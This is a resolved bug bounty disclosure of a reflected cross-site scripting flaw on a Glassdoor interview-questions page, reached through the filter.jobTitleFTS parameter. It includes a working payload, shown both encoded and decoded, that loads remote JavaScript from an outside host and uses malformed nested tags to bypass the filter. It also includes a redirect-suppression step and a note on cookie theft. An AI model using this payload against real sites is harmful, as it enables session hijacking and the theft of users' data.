Reflected XSS at https://www.glassdoor.com/Interview/Accenturme-Interview-Questions-E9931.htm via filter.jobTitleFTS parameter
Medium
G
Glassdoor
Submitted None
Actions:
Reported by
n1xk_10
Vulnerability Details
Technical details and impact analysis
The endpoint https://www.glassdoor.com/Interview/Accenturme-Interview-Questions-E9931.htm is vulnerable to reflected XSS.
Affected Parameter: filter.jobTitleFTS
Browsers tested: Chrome, Firefox
Payload: %3c%3c%3ca%3ea%3escript%20SrC%3d%22%68%74%74%70s%3a%2f%2f%73%6b%69%6e%6e%79%2d%66%65%61%72%2e%73%75%72%67%65%2e%73%68%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%3c%3ca%3ea%3e%2fscript%3e
Decoded: <<<a>a>script SrC="https://skinny-fear.surge.sh/payload.js"><<<a>a>/script>
Steps To Reproduce:
1. Navigate to https://www.glassdoor.com/Interview/Accenture-Interview-Questions-E4138.htm?filter.jobTitleFTS=Business%20Analyst
2. Add a parameter countryRedirect=True
3. Because of this parameter the browser does not get redirected to another page when we enter payload.
4. Now enter the payload inside filter.jobTitleFTS parameter
5. See the response, an alert will pop up
## Impact
Using XSS an attacker can steals the victim cookie and can also redirect him to a malicious site controlled by the attacker.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected